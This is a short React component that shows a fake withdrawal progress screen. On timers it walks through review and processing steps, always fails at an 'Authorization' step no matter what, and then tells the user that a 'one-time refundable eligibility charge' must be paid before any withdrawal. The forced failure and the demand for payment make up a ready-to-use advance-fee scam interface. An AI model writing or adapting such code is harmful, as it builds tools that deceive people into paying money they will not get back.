import React, { useEffect, useState } from 'react';

const steps = ['Reviewing', 'Processing', 'Authorization', 'Transfering', 'Completed'];

const TransactionModal = ({ onClose }) => {
  const [statuses, setStatuses] = useState(steps.map(() => 'loading'));
  const [currentStep, setCurrentStep] = useState(0);
  const [failed, setFailed] = useState(false);

  useEffect(() => {
    if (currentStep >= steps.length || failed) return;

    const timeout = setTimeout(() => {
      setStatuses((prev) => {
        const newStatuses = [...prev];
        if (steps[currentStep] === 'Authorization') {
          newStatuses[currentStep] = 'error';
          setFailed(true);
        } else {
          newStatuses[currentStep] = 'success';
          setCurrentStep(currentStep + 1);
        }
        return newStatuses;
      });
    }, 1500);

    return () => clearTimeout(timeout);
  }, [currentStep, failed]);

  return (
    <div className="modal-overlay">
      <div className="modal-content">
        <h2>Transaction Status</h2>
        <div className="steps">
          {steps.map((step, index) => (
            <div className="step" key={index}>
              {statuses[index] === 'loading' && <div className="spinner" />}
              {statuses[index] === 'success' && <div className="check">&#10003;</div>}
              {statuses[index] === 'error' && <div className="cross">&#10060;</div>}
              <span>{step}</span>
            </div>
          ))}
        </div>
        {failed && (
          <div className="error-message">
            <h3>Authorization Failed</h3>
            <p>🔒 Withdrawal Not Authorized

Your account is currently ineligible for withdrawals. As a new account holder, a one-time refundable eligibility charge is required to activate withdrawal privileges and verify account status.

👉Action Required:
Please complete the eligibility payment to proceed with your withdrawal.</p>
            <button onClick={onClose}>Close</button>
          </div>
        )}
      </div>
    </div>
  );
};

export default TransactionModal;
